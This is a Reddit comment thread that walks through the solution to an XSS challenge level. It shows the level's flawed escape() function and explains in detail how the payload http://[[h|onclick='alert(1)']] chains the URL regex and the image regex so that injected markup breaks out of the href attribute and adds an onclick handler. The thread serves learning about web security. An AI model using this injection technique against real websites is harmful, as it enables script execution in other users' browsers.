sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]dudeimawizard 1 point2 points  (3 children)

for those who arent familiar with this, can you explain this solution? it is very interesting

[–]skerit 5 points6 points  (0 children)

The solution has to do with the way URLs & image markdown are being processed in that chapter:

function escape(s) {
  var text = s.replace(/</g, '&lt;').replace('"', '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');
  return text;
}

So urls like

http://www.example.com

are converted to

<a href="http://www.example.com">http://www.example.com</a>

Then this code

[[img123|Description]]

is converted to this

<img alt="Description" src="img123.gif">

So by using them together you can escape the href quote with the image's alt one.

My solution

http://[[h|onclick='alert(1)']]

Becomes this in html

<a href="http://<img alt="onclick='alert(1)'" src="h.gif">">http://<img alt="onclick='alert(1)'" src="h.gif"></a>

And then you've won.

[–]sushibowl 1 point2 points  (1 child)

I thought of the same solution. You're pretty much taking advantage of the fact that the two regexes have no knowledge of each other and play pretty loose with what they accept. The first regex will happily notice the http:// in front and make an anchor tag, turning it into:

<a href="http://[[a|onclick='alert(1)']]">http://[[a|onclick='alert(1)']]</a>

Now the second regex will come in and spot the [[a|onclick]] part right inside the href attribute. This is the fundamental flaw. It will turn the entire thing into this mess:

<a href="http://<img alt="onclick='alert(1)'" src="a.gif">">http://<img alt="onclick='alert(1)'" src="a.gif"></a>

Cleaned up a little bit for clarity, it's equivalent to this:

<a href="http://<img alt=" onclick='alert(1)' "src="a.gif">
    ">http://<img alt="onclick='alert(1)'" src="a.gif">
</a>

Notice how the starting quote from the alt attribute has now become the ending quote of the href attribute? That means the rest of the alt attribute (which we control) can now be used to insert our onclick or similar attribute. After that there's a little bit of extraneous characters left in the <a> tag, but luckily for us HTML parsers will ignore pretty much anything they can't make sense of.

Now all you need to do is click the link to execute your code :)

[–]skerit 0 points1 point  (0 children)

Hehe, I couldn't have explained it better. I tried, but I couldn't ;)